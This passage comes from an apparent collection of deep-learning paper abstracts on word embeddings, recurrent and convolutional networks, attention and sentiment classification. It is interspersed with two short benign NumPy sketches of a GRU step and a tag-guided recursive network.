As an alternative to an importance sampling method proposed to speed-up training, we introduce a hierarchical decomposition of the conditional probabilities that yields a speed-up of about 200 both during training and recognition. The hierarchical decomposition is a binary hierarchical clustering constrained by the prior knowledge extracted from the WordNet semantic hierarchy. --- paper_title: Efficient Estimation of Word Representations in Vector Space paper_content: We propose two novel model architectures for computing continuous vector representations of words from very large data sets. The quality of these representations is measured in a word similarity task, and the results are compared to the previously best performing techniques based on different types of neural networks. We observe large improvements in accuracy at much lower computational cost, i.e. it takes less than a day to learn high quality word vectors from a 1.6 billion words data set. Furthermore, we show that these vectors provide state-of-the-art performance on our test set for measuring syntactic and semantic word similarities. --- paper_title: Natural Language Processing (almost) from Scratch paper_content: We propose a unified neural network architecture and learning algorithm that can be applied to various natural language processing tasks including part-of-speech tagging, chunking, named entity recognition, and semantic role labeling. This versatility is achieved by trying to avoid task-specific engineering and therefore disregarding a lot of prior knowledge. Instead of exploiting man-made input features carefully optimized for each task, our system learns internal representations on the basis of vast amounts of mostly unlabeled training data. This work is then used as a basis for building a freely available tagging system with good performance and minimal computational requirements. --- paper_title: Reducing the Dimensionality of Data with Neural Networks paper_content: High-dimensional data can be converted to low-dimensional codes by training a multilayer neural network with a small central layer to reconstruct high-dimensional input vectors. Gradient descent can be used for fine-tuning the weights in such “autoencoder” networks, but this works well only if the initial weights are close to a good solution. We describe an effective way of initializing the weights that allows deep autoencoder networks to learn low-dimensional codes that work much better than principal components analysis as a tool to reduce the dimensionality of data. --- paper_title: Greedy layer-wise training of deep networks paper_content: Complexity theory of circuits strongly suggests that deep architectures can be much more efficient (sometimes exponentially) than shallow architectures, in terms of computational elements required to represent some functions. Deep multi-layer neural networks have many levels of non-linearities allowing them to compactly represent highly non-linear and highly-varying functions. However, until recently it was not clear how to train such deep networks, since gradient-based optimization starting from random initialization appears to often get stuck in poor solutions. Hinton et al. recently introduced a greedy layer-wise unsupervised learning algorithm for Deep Belief Networks (DBN), a generative model with many layers of hidden causal variables. 
In the context of the above optimization problem, we study this algorithm empirically and explore variants to better understand its success and extend it to cases where the inputs are continuous or where the structure of the input distribution is not revealing enough about the variable to be predicted in a supervised task. Our experiments also confirm the hypothesis that the greedy layer-wise unsupervised training strategy mostly helps the optimization, by initializing weights in a region near a good local minimum, giving rise to internal distributed representations that are high-level abstractions of the input, bringing better generalization. --- paper_title: Extracting and composing robust features with denoising autoencoders paper_content: Previous work has shown that the difficulties in learning deep generative or discriminative models can be overcome by an initial unsupervised learning step that maps inputs to useful intermediate representations. We introduce and motivate a new training principle for unsupervised learning of a representation based on the idea of making the learned representations robust to partial corruption of the input pattern. This approach can be used to train autoencoders, and these denoising autoencoders can be stacked to initialize deep architectures. The algorithm can be motivated from a manifold learning and information theoretic perspective or from a generative model perspective. Comparative experiments clearly show the surprising advantage of corrupting the input of autoencoders on a pattern classification benchmark suite. --- paper_title: Traffic sign recognition with multi-scale Convolutional Networks paper_content: We apply Convolutional Networks (ConvNets) to the task of traffic sign classification as part of the GTSRB competition. ConvNets are biologically-inspired multi-stage architectures that automatically learn hierarchies of invariant features. While many popular vision approaches use hand-crafted features such as HOG or SIFT, ConvNets learn features at every level from data that are tuned to the task at hand. The traditional ConvNet architecture was modified by feeding 1st stage features in addition to 2nd stage features to the classifier. The system yielded the 2nd-best accuracy of 98.97% during phase I of the competition (the best entry obtained 98.98%), above the human performance of 98.81%, using 32×32 color input images. Experiments conducted after phase 1 produced a new record of 99.17% by increasing the network capacity, and by using greyscale images instead of color. Interestingly, random features still yielded competitive results (97.33%). --- paper_title: Finding Structure in Time paper_content: Time underlies many interesting human behaviors. Thus, the question of how to represent time in connectionist models is very important. One approach is to represent time implicitly by its effects on processing rather than explicitly (as in a spatial representation). The current report develops a proposal along these lines first described by Jordan (1986) which involves the use of recurrent links in order to provide networks with a dynamic memory. In this approach, hidden unit patterns are fed back to themselves; the internal representations which develop thus reflect task demands in the context of prior internal states. A set of simulations is reported which range from relatively simple problems (temporal version of XOR) to discovering syntactic/semantic features for words. 
The networks are able to learn interesting internal representations which incorporate task demands with memory demands; indeed, in this approach the notion of memory is inextricably bound up with task processing. These representations reveal a rich structure, which allows them to be highly context-dependent while also expressing generalizations across classes of items. These representations suggest a method for representing lexical categories and the type/token distinction. --- paper_title: Bidirectional recurrent neural networks paper_content: In the first part of this paper, a regular recurrent neural network (RNN) is extended to a bidirectional recurrent neural network (BRNN). The BRNN can be trained without the limitation of using input information just up to a preset future frame. This is accomplished by training it simultaneously in positive and negative time direction. Structure and training procedure of the proposed network are explained. In regression and classification experiments on artificial data, the proposed structure gives better results than other approaches. For real data, classification experiments for phonemes from the TIMIT database show the same tendency. In the second part of this paper, it is shown how the proposed bidirectional structure can be easily modified to allow efficient estimation of the conditional posterior probability of complete symbol sequences without making any explicit assumption about the shape of the distribution. For this part, experiments on real data are reported. --- paper_title: Improved Semantic Representations From Tree-Structured Long Short-Term Memory Networks paper_content: Because of their superior ability to preserve sequence information over time, Long Short-Term Memory (LSTM) networks, a type of recurrent neural network with a more complex computational unit, have obtained strong results on a variety of sequence modeling tasks. The only underlying LSTM structure that has been explored so far is a linear chain. However, natural language exhibits syntactic properties that would naturally combine words to phrases. We introduce the Tree-LSTM, a generalization of LSTMs to tree-structured network topologies. Tree-LSTMs outperform all existing systems and strong LSTM baselines on two tasks: predicting the semantic relatedness of two sentences (SemEval 2014, Task 1) and sentiment classification (Stanford Sentiment Treebank). --- paper_title: Learning Phrase Representations using RNN Encoder-Decoder for Statistical Machine Translation paper_content: In this paper, we propose a novel neural network model called RNN Encoder‐ Decoder that consists of two recurrent neural networks (RNN). One RNN encodes a sequence of symbols into a fixedlength vector representation, and the other decodes the representation into another sequence of symbols. The encoder and decoder of the proposed model are jointly trained to maximize the conditional probability of a target sequence given a source sequence. The performance of a statistical machine translation system is empirically found to improve by using the conditional probabilities of phrase pairs computed by the RNN Encoder‐Decoder as an additional feature in the existing log-linear model. Qualitatively, we show that the proposed model learns a semantically and syntactically meaningful representation of linguistic phrases. 
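Several of the entries above (the RNN Encoder-Decoder, GRU, and LSTM papers) revolve around gated recurrent units. As a concrete illustration of that gating idea, here is a minimal NumPy sketch of a single GRU step; it follows one common formulation rather than any cited paper's exact implementation, and all weight names, dimensions, and the toy data are assumptions made for the example.

```python
import numpy as np

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

def gru_step(x_t, h_prev, p):
    """One GRU step: update gate z, reset gate r, candidate state h_tilde."""
    z = sigmoid(p["W_z"] @ x_t + p["U_z"] @ h_prev + p["b_z"])             # update gate
    r = sigmoid(p["W_r"] @ x_t + p["U_r"] @ h_prev + p["b_r"])             # reset gate
    h_tilde = np.tanh(p["W_h"] @ x_t + p["U_h"] @ (r * h_prev) + p["b_h"])  # candidate state
    return (1.0 - z) * h_prev + z * h_tilde                                 # interpolate old/new state

# Toy usage: run a random 5-step "sentence" of 4-dimensional word vectors through the cell.
rng = np.random.default_rng(0)
input_dim, hidden_dim = 4, 3
p = {}
for g in ("z", "r", "h"):
    p[f"W_{g}"] = rng.standard_normal((hidden_dim, input_dim)) * 0.1
    p[f"U_{g}"] = rng.standard_normal((hidden_dim, hidden_dim)) * 0.1
    p[f"b_{g}"] = np.zeros(hidden_dim)
h = np.zeros(hidden_dim)
for x_t in rng.standard_normal((5, input_dim)):
    h = gru_step(x_t, h, p)
print(h)   # final hidden state; a sentiment classifier would read this vector
```

An LSTM differs mainly in keeping a separate memory cell and using three gates instead of two, which is why the two units are often compared head to head as in the entries above.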
--- paper_title: Empirical Evaluation of Gated Recurrent Neural Networks on Sequence Modeling paper_content: In this paper we compare different types of recurrent units in recurrent neural networks (RNNs). Especially, we focus on more sophisticated units that implement a gating mechanism, such as a long short-term memory (LSTM) unit and a recently proposed gated recurrent unit (GRU). We evaluate these recurrent units on the tasks of polyphonic music modeling and speech signal modeling. Our experiments revealed that these advanced recurrent units are indeed better than more traditional recurrent units such as tanh units. Also, we found GRU to be comparable to LSTM. --- paper_title: Hierarchical Probabilistic Neural Network Language Model paper_content: In recent years, variants of a neural network architecture for statistical language modeling have been proposed and successfully applied, e.g. in the language modeling component of speech recognizers. The main advantage of these architectures is that they learn an embedding for words (or other symbols) in a continuous space that helps to smooth the language model and provide good generalization even when the number of training examples is insufficient. However, these models are extremely slow in comparison to the more commonly used n-gram models, both for training and recognition. As an alternative to an importance sampling method proposed to speed-up training, we introduce a hierarchical decomposition of the conditional probabilities that yields a speed-up of about 200 both during training and recognition. The hierarchical decomposition is a binary hierarchical clustering constrained by the prior knowledge extracted from the WordNet semantic hierarchy. --- paper_title: Convolutional deep belief networks for scalable unsupervised learning of hierarchical representations paper_content: There has been much interest in unsupervised learning of hierarchical generative models such as deep belief networks. Scaling such models to full-sized, high-dimensional images remains a difficult problem. To address this problem, we present the convolutional deep belief network, a hierarchical generative model which scales to realistic image sizes. This model is translation-invariant and supports efficient bottom-up and top-down probabilistic inference. Key to our approach is probabilistic max-pooling, a novel technique which shrinks the representations of higher layers in a probabilistically sound way. Our experiments show that the algorithm learns useful high-level visual features, such as object parts, from unlabeled images of objects and natural scenes. We demonstrate excellent performance on several visual recognition tasks and show that our model can perform hierarchical (bottom-up and top-down) inference over full-sized images. --- paper_title: Neural Machine Translation by Jointly Learning to Align and Translate paper_content: Neural machine translation is a recently proposed approach to machine translation. Unlike the traditional statistical machine translation, the neural machine translation aims at building a single neural network that can be jointly tuned to maximize the translation performance. The models proposed recently for neural machine translation often belong to a family of encoder-decoders and consists of an encoder that encodes a source sentence into a fixed-length vector from which a decoder generates a translation. 
In this paper, we conjecture that the use of a fixed-length vector is a bottleneck in improving the performance of this basic encoder-decoder architecture, and propose to extend this by allowing a model to automatically (soft-)search for parts of a source sentence that are relevant to predicting a target word, without having to form these parts as a hard segment explicitly. With this new approach, we achieve a translation performance comparable to the existing state-of-the-art phrase-based system on the task of English-to-French translation. Furthermore, qualitative analysis reveals that the (soft-)alignments found by the model agree well with our intuition. --- paper_title: Distributed Representations of Sentences and Documents paper_content: Many machine learning algorithms require the input to be represented as a fixed-length feature vector. When it comes to texts, one of the most common fixed-length features is bag-of-words. Despite their popularity, bag-of-words features have two major weaknesses: they lose the ordering of the words and they also ignore semantics of the words. For example, "powerful," "strong" and "Paris" are equally distant. In this paper, we propose Paragraph Vector, an unsupervised algorithm that learns fixed-length feature representations from variable-length pieces of texts, such as sentences, paragraphs, and documents. Our algorithm represents each document by a dense vector which is trained to predict words in the document. Its construction gives our algorithm the potential to overcome the weaknesses of bag-of-words models. Empirical results show that Paragraph Vectors outperforms bag-of-words models as well as other techniques for text representations. Finally, we achieve new state-of-the-art results on several text classification and sentiment analysis tasks. --- paper_title: Document Modeling with Gated Recurrent Neural Network for Sentiment Classification paper_content: Document level sentiment classification remains a challenge: encoding the intrinsic relations between sentences in the semantic meaning of a document. To address this, we introduce a neural network model to learn vector-based document representation in a unified, bottom-up fashion. The model first learns sentence representation with convolutional neural network or long short-term memory. Afterwards, semantics of sentences and their relations are adaptively encoded in document representation with gated recurrent neural network. We conduct document level sentiment classification on four large-scale review datasets from IMDB and Yelp Dataset Challenge. Experimental results show that: (1) our neural model shows superior performances over several state-of-the-art algorithms; (2) gated recurrent neural network dramatically outperforms standard recurrent neural network in document modeling for sentiment classification. 1 --- paper_title: Effective Use of Word Order for Text Categorization with Convolutional Neural Networks paper_content: Convolutional neural network (CNN) is a neural network that can make use of the internal structure of data such as the 2D structure of image data. This paper studies CNN on text categorization to exploit the 1D structure (namely, word order) of text data for accurate prediction. Instead of using low-dimensional word vectors as input as is often done, we directly apply CNN to high-dimensional text data, which leads to directly learning embedding of small text regions for use in classification. 
In addition to a straightforward adaptation of CNN from image to text, a simple but new variation which employs bag-of-word conversion in the convolution layer is proposed. An extension to combine multiple convolution layers is also explored for higher accuracy. The experiments demonstrate the effectiveness of our approach in comparison with state-of-the-art methods. --- paper_title: Domain Adaptation for Large-Scale Sentiment Classification: A Deep Learning Approach paper_content: The exponential increase in the availability of online reviews and recommendations makes sentiment classification an interesting topic in academic and industrial research. Reviews can span so many different domains that it is difficult to gather annotated training data for all of them. Hence, this paper studies the problem of domain adaptation for sentiment classifiers, hereby a system is trained on labeled reviews from one source domain but is meant to be deployed on another. We propose a deep learning approach which learns to extract a meaningful representation for each review in an unsupervised fashion. Sentiment classifiers trained with this high-level feature representation clearly outperform state-of-the-art methods on a benchmark composed of reviews of 4 types of Amazon products. Furthermore, this method scales well and allowed us to successfully perform domain adaptation on a larger industrial-strength dataset of 22 domains. --- paper_title: Learning Semantic Representations of Users and Products for Document Level Sentiment Classification paper_content: Neural network methods have achieved promising results for sentiment classification of text. However, these models only use semantics of texts, while ignoring users who express the sentiment and products which are evaluated, both of which have great influences on interpreting the sentiment of text. In this paper, we address this issue by incorporating userand productlevel information into a neural network approach for document level sentiment classification. Users and products are modeled using vector space models, the representations of which capture important global clues such as individual preferences of users or overall qualities of products. Such global evidence in turn facilitates embedding learning procedure at document level, yielding better text representations. By combining evidence at user-, productand documentlevel in a unified neural framework, the proposed model achieves state-of-the-art performances on IMDB and Yelp datasets1. --- paper_title: End-to-end adversarial memory network for cross-domain sentiment classification paper_content: Domain adaptation tasks such as cross-domain sentiment classification have raised much attention in recent years. Due to the domain discrepancy, a sentiment classifier trained in a source domain may not work well when directly applied to a target domain. Traditional methods need to manually select pivots, which behave in the same way for discriminative learning in both domains. Recently, deep learning methods have been proposed to learn a representation shared by domains. However, they lack the interpretability to directly identify the pivots. To address the problem, we introduce an end-to-end Adversarial Memory Network (AMN) for cross-domain sentiment classification. Unlike existing methods, the proposed AMN can automatically capture the pivots using an attention mechanism. 
Our framework consists of two parameter-shared memory networks with one for sentiment classification and the other for domain classification. The two networks are jointly trained so that the selected features minimize the sentiment classification error and at the same time make the domain classifier indiscriminative between the representations from the source or target domains. Moreover, unlike deep learning methods that cannot tell which words are the pivots, AMN can offer a direct visualization of them. Experiments on the Amazon review dataset demonstrate that AMN can significantly outperform state-of-the-art methods. --- paper_title: Cached Long Short-Term Memory Neural Networks for Document-Level Sentiment Classification paper_content: Recently, neural networks have achieved great success on sentiment classification due to their ability to alleviate feature engineering. However, one of the remaining challenges is to model long texts in document-level sentiment classification under a recurrent architecture because of the deficiency of the memory unit. To address this problem, we present a Cached Long Short-Term Memory neural networks (CLSTM) to capture the overall semantic information in long texts. CLSTM introduces a cache mechanism, which divides memory into several groups with different forgetting rates and thus enables the network to keep sentiment information better within a recurrent unit. The proposed CLSTM outperforms the state-of-the-art models on three publicly available document-level sentiment analysis datasets. --- paper_title: Hierarchical Attention Networks for Document Classification paper_content: We propose a hierarchical attention network for document classification. Our model has two distinctive characteristics: (i) it has a hierarchical structure that mirrors the hierarchical structure of documents; (ii) it has two levels of attention mechanisms applied at the wordand sentence-level, enabling it to attend differentially to more and less important content when constructing the document representation. Experiments conducted on six large scale text classification tasks demonstrate that the proposed architecture outperform previous methods by a substantial margin. Visualization of the attention layers illustrates that the model selects qualitatively informative words and sentences. --- paper_title: Weakly-supervised deep learning for customer review sentiment classification paper_content: Sentiment analysis is one of the key challenges for mining online user generated content. In this work, we focus on customer reviews which are an important form of opinionated content. The goal is to identify each sentence's semantic orientation (e.g. positive or negative) of a review. Traditional sentiment classification methods often involve substantial human efforts, e.g. lexicon construction, feature engineering. In recent years, deep learning has emerged as an effective means for solving sentiment classification problems. A neural network intrinsically learns a useful representation automatically without human efforts. However, the success of deep learning highly relies on the availability of large-scale training data. In this paper, we propose a novel deep learning framework for review sentiment classification which employs prevalently available ratings as weak supervision signals. 
The framework consists of two steps: (1) learn a high level representation (embedding space) which captures the general sentiment distribution of sentences through rating information; (2) add a classification layer on top of the embedding layer and use labeled sentences for supervised fine-tuning. Experiments on review data obtained from Amazon show the efficacy of our method and its superiority over baseline methods. --- paper_title: CNN- and LSTM-based Claim Classification in Online User Comments paper_content: When processing arguments in online user interactive discourse, it is often necessary to determine their bases of support. In this paper, we describe a supervised approach, based on deep neural networks, for classifying the claims made in online arguments. We conduct experiments using convolutional neural networks (CNNs) and long short-term memory networks (LSTMs) on two claim data sets compiled from online user comments. Using different types of distributional word embeddings, but without incorporating any rich, expensive set of features, we achieve a significant improvement over the state of the art for one data set (which categorizes arguments as factual vs. emotional), and performance comparable to the state of the art on the other data set (which categorizes claims according to their verifiability). Our approach has the advantages of using a generalized, simple, and effective methodology that works for claim categorization on different data sets and tasks. --- paper_title: Semi-Supervised Recursive Autoencoders for Predicting Sentiment Distributions paper_content: We introduce a novel machine learning framework based on recursive autoencoders for sentence-level prediction of sentiment label distributions. Our method learns vector space representations for multi-word phrases. In sentiment prediction tasks these representations outperform other state-of-the-art approaches on commonly used datasets, such as movie reviews, without using any pre-defined sentiment lexica or polarity shifting rules. We also evaluate the model's ability to predict sentiment distributions on a new dataset based on confessions from the experience project. The dataset consists of personal user stories annotated with multiple labels which, when aggregated, form a multinomial distribution that captures emotional reactions. Our algorithm can more accurately predict distributions over such labels compared to several competitive baselines. --- paper_title: Dimensional Sentiment Analysis Using a Regional CNN-LSTM Model paper_content: Dimensional sentiment analysis aims to recognize continuous numerical values in multiple dimensions such as the valencearousal (VA) space. Compared to the categorical approach that focuses on sentiment classification such as binary classification (i.e., positive and negative), the dimensional approach can provide more fine-grained sentiment analysis. This study proposes a regional CNN-LSTM model consisting of two parts: regional CNN and LSTM to predict the VA ratings of texts. Unlike a conventional CNN which considers a whole text as input, the proposed regional CNN uses an individual sentence as a region, dividing an input text into several regions such that the useful affective information in each region can be extracted and weighted according to their contribution to the VA prediction. Such regional information is sequentially integrated across regions using LSTM for VA prediction. 
By combining the regional CNN and LSTM, both local (regional) information within sentences and long-distance dependency across sentences can be considered in the prediction process. Experimental results show that the proposed method outperforms lexicon-based, regression-based, and NN-based methods proposed in previous studies. --- paper_title: A Convolutional Neural Network for Modelling Sentences paper_content: The ability to accurately represent sentences is central to language understanding. We describe a convolutional architecture dubbed the Dynamic Convolutional Neural Network (DCNN) that we adopt for the semantic modelling of sentences. The network uses Dynamic k-Max Pooling, a global pooling operation over linear sequences. The network handles input sentences of varying length and induces a feature graph over the sentence that is capable of explicitly capturing short and long-range relations. The network does not rely on a parse tree and is easily applicable to any language. We test the DCNN in four experiments: small scale binary and multi-class sentiment prediction, six-way question classification and Twitter sentiment prediction by distant supervision. The network achieves excellent performance in the first three tasks and a greater than 25% error reduction in the last task with respect to the strongest baseline. --- paper_title: Encoding Syntactic Knowledge in Neural Networks for Sentiment Classification paper_content: Phrase/Sentence representation is one of the most important problems in natural language processing. Many neural network models such as Convolutional Neural Network (CNN), Recursive Neural Network (RNN), and Long Short-Term Memory (LSTM) have been proposed to learn representations of phrase/sentence, however, rich syntactic knowledge has not been fully explored when composing a longer text from its shorter constituent words. In most traditional models, only word embeddings are utilized to compose phrase/sentence representations, while the syntactic information of words is yet to be explored. In this article, we discover that encoding syntactic knowledge (part-of-speech tag) in neural networks can enhance sentence/phrase representation. Specifically, we propose to learn tag-specific composition functions and tag embeddings in recursive neural networks, and propose to utilize POS tags to control the gates of tree-structured LSTM networks. We evaluate these models on two benchmark datasets for sentiment classification, and demonstrate that improvements can be obtained with such syntactic knowledge encoded. --- paper_title: Deep Convolutional Neural Networks for Sentiment Analysis of Short Texts paper_content: Sentiment analysis of short texts such as single sentences and Twitter messages is challenging because of the limited contextual information that they normally contain. Effectively solving this task requires strategies that combine the small text content with prior knowledge and use more than just bag-of-words. In this work we propose a new deep convolutional neural network that exploits from characterto sentence-level information to perform sentiment analysis of short texts. We apply our approach for two corpora of two different domains: the Stanford Sentiment Treebank (SSTb), which contains sentences from movie reviews; and the Stanford Twitter Sentiment corpus (STS), which contains Twitter messages. 
For the SSTb corpus, our approach achieves state-of-the-art results for single sentence sentiment prediction in both binary positive/negative classification, with 85.7% accuracy, and fine-grained classification, with 48.3% accuracy. For the STS corpus, our approach achieves a sentiment prediction accuracy of 86.4%. --- paper_title: Framewise phoneme classification with bidirectional LSTM and other neural network architectures paper_content: In this paper, we present bidirectional Long Short Term Memory (LSTM) networks, and a modified, full gradient version of the LSTM learning algorithm. We evaluate Bidirectional LSTM (BLSTM) and several other network architectures on the benchmark task of framewise phoneme classification, using the TIMIT database. Our main findings are that bidirectional networks outperform unidirectional ones, and Long Short Term Memory (LSTM) is much faster and also more accurate than both standard Recurrent Neural Nets (RNNs) and time-windowed Multilayer Perceptrons (MLPs). Our results support the view that contextual information is crucial to speech processing, and suggest that BLSTM is an effective architecture with which to exploit it'. --- paper_title: Predicting Polarities of Tweets by Composing Word Embeddings with Long Short-Term Memory paper_content: In this paper, we introduce Long ShortTerm Memory (LSTM) recurrent network for twitter sentiment prediction. With the help of gates and constant error carousels in the memory block structure, the model could handle interactions between words through a flexible compositional function. Experiments on a public noisy labelled data show that our model outperforms several feature-engineering approaches, with the result comparable to the current best data-driven technique. According to the evaluation on a generated negation phrase test set, the proposed architecture doubles the performance of non-neural model based on bag-of-word features. Furthermore, words with special functions (such as negation and transition) are distinguished and the dissimilarities of words with opposite sentiment are magnified. An interesting case study on negation expression processing shows a promising potential of the architecture dealing with complex sentiment phrases. --- paper_title: Learning Tag Embeddings and Tag-specific Composition Functions in Recursive Neural Network paper_content: Recursive neural network is one of the most successful deep learning models for natural language processing due to the compositional nature of text. The model recursively composes the vector of a parent phrase from those of child words or phrases, with a key component named composition function. Although a variety of composition functions have been proposed, the syntactic information has not been fully encoded in the composition process. We propose two models, Tag Guided RNN (TGRNN for short) which chooses a composition function according to the part-ofspeech tag of a phrase, and Tag Embedded RNN/RNTN (TE-RNN/RNTN for short) which learns tag embeddings and then combines tag and word embeddings together. In the fine-grained sentiment classification, experiment results show the proposed models obtain remarkable improvement: TG-RNN/TE-RNN obtain remarkable improvement over baselines, TE-RNTN obtains the second best result among all the top performing models, and all the proposed models have much less parameters/complexity than their counterparts. 
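The last entry above describes recursive neural networks whose composition function is chosen by a syntactic tag. The toy NumPy sketch below composes a sentence vector bottom-up over a hand-written binary parse tree, picking a composition matrix per phrase tag; it is a simplified illustration under assumed tag sets and dimensions, not the cited model, which additionally learns tag embeddings and is trained end to end.

```python
import numpy as np

rng = np.random.default_rng(1)
dim = 4
# One composition matrix per phrase tag (illustrative tag set, randomly initialized).
W_by_tag = {tag: rng.standard_normal((dim, 2 * dim)) * 0.1 for tag in ("NP", "VP", "S")}

def compose(node):
    """node is either ('word', vector) or (tag, left_subtree, right_subtree)."""
    if node[0] == "word":
        return node[1]
    tag, left, right = node
    children = np.concatenate([compose(left), compose(right)])
    return np.tanh(W_by_tag[tag] @ children)        # tag-specific composition

def word():
    return ("word", rng.standard_normal(dim))        # stand-in for a learned word embedding

# Parse tree for "(S (NP the movie) (VP was great))" with random word vectors.
tree = ("S", ("NP", word(), word()), ("VP", word(), word()))
sentence_vec = compose(tree)                          # would feed a softmax sentiment layer
print(sentence_vec)
```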
--- paper_title: Recursive Deep Models for Semantic Compositionality Over a Sentiment Treebank paper_content: Semantic word spaces have been very useful but cannot express the meaning of longer phrases in a principled way. Further progress towards understanding compositionality in tasks such as sentiment detection requires richer supervised training and evaluation resources and more powerful models of composition. To remedy this, we introduce a Sentiment Treebank. It includes fine grained sentiment labels for 215,154 phrases in the parse trees of 11,855 sentences and presents new challenges for sentiment compositionality. To address them, we introduce the Recursive Neural Tensor Network. When trained on the new treebank, this model outperforms all previous methods on several metrics. It pushes the state of the art in single sentence positive/negative classification from 80% up to 85.4%. The accuracy of predicting fine-grained sentiment labels for all phrases reaches 80.7%, an improvement of 9.7% over bag of features baselines. Lastly, it is the only model that can accurately capture the effects of negation and its scope at various tree levels for both positive and negative phrases. --- paper_title: Semantic Compositionality through Recursive Matrix-Vector Spaces paper_content: Single-word vector space models have been very successful at learning lexical information. However, they cannot capture the compositional meaning of longer phrases, preventing them from a deeper understanding of language. We introduce a recursive neural network (RNN) model that learns compositional vector representations for phrases and sentences of arbitrary syntactic type and length. Our model assigns a vector and a matrix to every node in a parse tree: the vector captures the inherent meaning of the constituent, while the matrix captures how it changes the meaning of neighboring words or phrases. This matrix-vector RNN can learn the meaning of operators in propositional logic and natural language. The model obtains state of the art performance on three different experiments: predicting fine-grained sentiment distributions of adverb-adjective pairs; classifying sentiment labels of movie reviews and classifying semantic relationships such as cause-effect or topic-message between nouns using the syntactic path between them. --- paper_title: Adaptive Recursive Neural Network for Target-dependent Twitter Sentiment Classification paper_content: We propose Adaptive Recursive Neural Network (AdaRNN) for target-dependent Twitter sentiment classification. AdaRNN adaptively propagates the sentiments of words to target depending on the context and syntactic relationships between them. It consists of more than one composition functions, and we model the adaptive sentiment propagations as distributions over these composition functions. The experimental studies illustrate that AdaRNN improves the baseline methods. Furthermore, we introduce a manually annotated dataset for target-dependent Twitter sentiment analysis. --- paper_title: Dyadic Memory Networks for Aspect-based Sentiment Analysis paper_content: This paper proposes Dyadic Memory Networks (DyMemNN), a novel extension of end-to-end memory networks (memNN) for aspect-based sentiment analysis (ABSA). Originally designed for question answering tasks, memNN operates via a memory selection operation in which relevant memory pieces are adaptively selected based on the input query. 
In the problem of ABSA, this is analogous to aspects and documents in which the relationship between each word in the document is compared with the aspect vector. In the standard memory networks, simple dot products or feed forward neural networks are used to model the relationship between aspect and words which lacks representation learning capability. As such, our dyadic memory networks ameliorates this weakness by enabling rich dyadic interactions between aspect and word embeddings by integrating either parameterized neural tensor compositions or holographic compositions into the memory selection operation. To this end, we propose two variations of our dyadic memory networks, namely the Tensor DyMemNN and Holo DyMemNN. Overall, our two models are end-to-end neural architectures that enable rich dyadic interaction between aspect and document which intuitively leads to better performance. Via extensive experiments, we show that our proposed models achieve the state-of-the-art performance and outperform many neural architectures across six benchmark datasets. --- paper_title: Adaptive Recursive Neural Network for Target-dependent Twitter Sentiment Classification paper_content: We propose Adaptive Recursive Neural Network (AdaRNN) for target-dependent Twitter sentiment classification. AdaRNN adaptively propagates the sentiments of words to target depending on the context and syntactic relationships between them. It consists of more than one composition functions, and we model the adaptive sentiment propagations as distributions over these composition functions. The experimental studies illustrate that AdaRNN improves the baseline methods. Furthermore, we introduce a manually annotated dataset for target-dependent Twitter sentiment analysis. --- paper_title: Interactive Attention Networks for Aspect-Level Sentiment Classification paper_content: Aspect-level sentiment classification aims at identifying the sentiment polarity of specific target in its context. Previous approaches have realized the importance of targets in sentiment classification and developed various methods with the goal of precisely modeling their contexts via generating target-specific representations. However, these studies always ignore the separate modeling of targets. In this paper, we argue that both targets and contexts deserve special treatment and need to be learned their own representations via interactive learning. Then, we propose the interactive attention networks (IAN) to interactively learn attentions in the contexts and targets, and generate the representations for targets and contexts separately. With this design, the IAN model can well represent a target and its collocative context, which is helpful to sentiment classification. Experimental results on SemEval 2014 Datasets demonstrate the effectiveness of our model. --- paper_title: Effective LSTMs for Target-Dependent Sentiment Classification paper_content: Target-dependent sentiment classification remains a challenge: modeling the semantic relatedness of a target with its context words in a sentence. Different context words have different influences on determining the sentiment polarity of a sentence towards the target. Therefore, it is desirable to integrate the connections between target word and context words when building a learning system. In this paper, we develop two target dependent long short-term memory (LSTM) models, where target information is automatically taken into account. We evaluate our methods on a benchmark dataset from Twitter. 
Empirical results show that modeling sentence representation with standard LSTM does not perform well. Incorporating target information into LSTM can significantly boost the classification accuracy. The target-dependent LSTM models achieve state-of-the-art performances without using syntactic parser or external sentiment lexicons. --- paper_title: Deep Memory Networks for Attitude Identification paper_content: We consider the task of identifying attitudes towards a given set of entities from text. Conventionally, this task is decomposed into two separate subtasks: target detection that identifies whether each entity is mentioned in the text, either explicitly or implicitly, and polarity classification that classifies the exact sentiment towards an identified entity (the target) into positive, negative, or neutral. Instead, we show that attitude identification can be solved with an end-to-end machine learning architecture, in which the two subtasks are interleaved by a deep memory network. In this way, signals produced in target detection provide clues for polarity classification, and reversely, the predicted polarity provides feedback to the identification of targets. Moreover, the treatments for the set of targets also influence each other -- the learned representations may share the same semantics for some targets but vary for others. The proposed deep memory network, the AttNet, outperforms methods that do not consider the interactions between the subtasks or those among the targets, including conventional machine learning methods and the state-of-the-art deep learning models. --- paper_title: Gated neural networks for targeted sentiment analysis paper_content: Targeted sentiment analysis classifies the sentiment polarity towards each target entity mention in given text documents. Seminal methods extract manual discrete features from automatic syntactic parse trees in order to capture semantic information of the enclosing sentence with respect to a target entity mention. Recently, it has been shown that competitive accuracies can be achieved without using syntactic parsers, which can be highly inaccurate on noisy text such as tweets. This is achieved by applying distributed word representations and rich neural pooling functions over a simple and intuitive segmentation of tweets according to target entity mentions. In this paper, we extend this idea by proposing a sentence-level neural model to address the limitation of pooling functions, which do not explicitly model tweet-level semantics. First, a bi-directional gated neural network is used to connect the words in a tweet so that pooling functions can be applied over the hidden layer instead of words for better representing the target and its contexts. Second, a three-way gated neural network structure is used to model the interaction between the target mention and its surrounding contexts. Experiments show that our proposed model gives significantly higher accuracies compared to the current best method for targeted sentiment analysis. --- paper_title: Aspect Level Sentiment Classification with Deep Memory Network paper_content: We introduce a deep memory network for aspect level sentiment classification. Unlike feature-based SVM and sequential neural models such as LSTM, this approach explicitly captures the importance of each context word when inferring the sentiment polarity of an aspect. 
